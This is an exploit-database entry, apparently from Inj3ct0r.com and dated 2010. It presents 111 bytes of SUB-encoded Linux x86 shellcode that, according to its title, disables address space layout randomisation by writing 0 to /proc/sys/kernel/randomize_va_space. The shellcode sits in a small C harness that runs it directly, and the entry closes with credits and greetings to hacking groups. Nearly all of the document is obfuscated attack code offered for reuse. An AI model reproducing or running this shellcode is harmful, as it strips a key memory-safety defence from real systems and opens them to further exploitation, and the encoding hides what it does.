111 bytes small echo 0 > /proc/sys/kernel/randomize_va_space SUB encoded Linux / x86 shellcode.
76d3edb6e172058a17f11a644d1d2adb1159201130e3731720f790f40e375214
/*
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
Title : echo 0 > /proc/sys/kernel/randomize_va_space SUB encoded linux shellcode .
Name : 111 bytes echo 0 > /proc/sys/kernel/randomize_va_space SUB encoded linux shellcode .
Date : Mon Jul 5 16:58:50 WIT 2010
Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
Web : http://devilzc0de.org
blog : http://gunslingerc0de.wordpress.com
tested on : linux debian
special thanks to : r0073r (inj3ct0r.com), d3hydr8 (darkc0de.com), ty miller (projectshellcode.com), jonathan salwan(shell-storm.org), mywisdom (devilzc0de.org), loneferret (offensive-security.com)
greetzz to all devilzc0de, jasakom, yogyacarderlink, serverisdown, indonesianhacker and all my friend !!
*/
#include <stdio.h>
char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x57\x80\x44\x0e\xff\x01"
"\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff"
"\x5f\x30\xbf\x30\xd1\xaf\x0a\x51\x67\x6d\x2e\x72"
"\x67\x67\x2e\x2e\x61\x68\x88\xe2\x51\x67\x2c\x62"
"\x62\x62\x88\xe0\x51\xea\x06\x50\x52\x88\xe0\xcc"
"\x7f\x60\xe7\xf3\xfe\xfe\xfe\x64\x62\x67\x6e\x1f"
"\x2f\x1f\x3d\x1f\x2e\x6f\x71\x6e\x62\x2e\x72\x78"
"\x72\x2e\x6a\x64\x71\x6d\x64\x6b\x2e\x71\x60\x6d"
"\x63\x6e\x6c\x68\x79\x64\x5e\x75\x60\x5e\x72\x6f"
"\x60\x62\x64";
int main(void)
{
fprintf(stdout,"Length: %d\n",strlen(shellcode));
(*(void(*)()) shellcode)();
}